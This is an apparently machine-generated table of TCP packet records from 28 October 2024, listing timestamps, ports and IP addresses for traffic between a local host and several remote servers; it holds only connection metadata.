                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.123702049 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.123893976 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.124136925 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.124174118 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.124182940 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171531916 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171549082 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171642065 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171900988 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.171914101 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.173259020 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.173285961 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.173401117 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.173571110 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.173587084 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.181328058 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.181359053 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.181509972 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.183192968 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.183212042 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.326102972 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.326308012 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.326318026 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.327429056 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.327500105 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.328624010 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.328691959 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.381395102 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.381422043 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.462675095 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.463278055 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.463310957 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.463751078 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.463762999 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.489866018 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.520495892 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.607404947 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.607491016 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.607558012 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.632813931 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.632884026 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.690776110 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.690776110 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.690823078 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.690850019 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.782776117 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.782788038 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.782799006 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.782804966 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.787223101 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.791486979 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.796657085 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.814789057 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.814799070 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.814901114 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.814909935 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.815005064 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.815027952 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.815831900 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.815881968 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.817248106 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.817323923 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.818527937 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.818597078 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.818603992 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.818666935 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.824080944 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.824310064 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.825273037 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.825279951 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.826071978 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.826253891 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.826308966 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.826317072 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.826318979 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.835720062 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.840243101 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.858185053 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.871360064 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.874474049 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.908749104 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.908811092 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.908974886 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.909785032 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.909816980 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.909816980 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.909816980 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.909838915 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.917829037 CET49806443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.917854071 CET4434980613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.918977976 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.919025898 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.920814037 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.920829058 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.923070908 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.923075914 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.923644066 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.923649073 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.924668074 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.924671888 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.925314903 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.925318003 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.926877022 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.926892996 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.927603006 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.927608967 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.957087994 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.957181931 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.968044996 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.968111038 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.968230009 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.968359947 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.968463898 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.971805096 CET49800443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.971846104 CET44349800162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.973434925 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.973510027 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.980401993 CET49798443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.980415106 CET44349798162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.981904030 CET49799443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.981921911 CET44349799162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.990099907 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.997639894 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.997658968 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.997742891 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.998096943 CET49807443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.998106956 CET4434980720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001478910 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001513958 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001858950 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001878977 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001924992 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001936913 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.001966953 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.002007008 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.002480984 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.046231985 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.046315908 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.047444105 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.047458887 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058497906 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058563948 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058607101 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058890104 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058898926 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058907986 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.058912039 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059529066 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059576988 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059633970 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059664011 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059725046 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059760094 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059766054 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059792042 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059798002 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059817076 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059823036 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059833050 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.059839010 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.060441971 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.060446978 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.060453892 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.060456991 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.061645985 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.061660051 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.061753035 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.061759949 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.064909935 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.064935923 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.064985991 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.065922976 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.065973997 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.066051960 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.066817999 CET49808443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.066829920 CET4434980813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.067050934 CET49809443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.067079067 CET4434980913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.074749947 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.074763060 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.074872971 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.075676918 CET49810443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.075689077 CET4434981013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.077646971 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.077677965 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.077816010 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.079704046 CET49811443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.079727888 CET4434981113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.100277901 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.100296021 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.100368977 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.100732088 CET49812443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.100743055 CET4434981220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.193490028 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.213994980 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.219630957 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.298453093 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.298558950 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.300118923 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.300136089 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.302819967 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.303430080 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.303443909 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.312851906 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.313247919 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.313261986 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.320126057 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.320194960 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.320207119 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.356981993 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.357032061 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.357168913 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.358098984 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.358175039 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.358239889 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359075069 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359102964 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359162092 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359543085 CET49813443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359570980 CET44349813162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359926939 CET49814443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.359940052 CET44349814162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.388559103 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.388575077 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.421709061 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.422014952 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.422029018 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.427061081 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.429529905 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.429543972 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.435734034 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.435864925 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.435877085 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.443984985 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.444066048 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.444075108 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.444096088 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.444163084 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.457607985 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.457685947 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.495382071 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.545308113 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.545365095 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.545382977 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.550992012 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.551623106 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.551635981 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.560792923 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.560857058 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.560868979 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.566798925 CET44349793142.250.184.193192.168.2.5
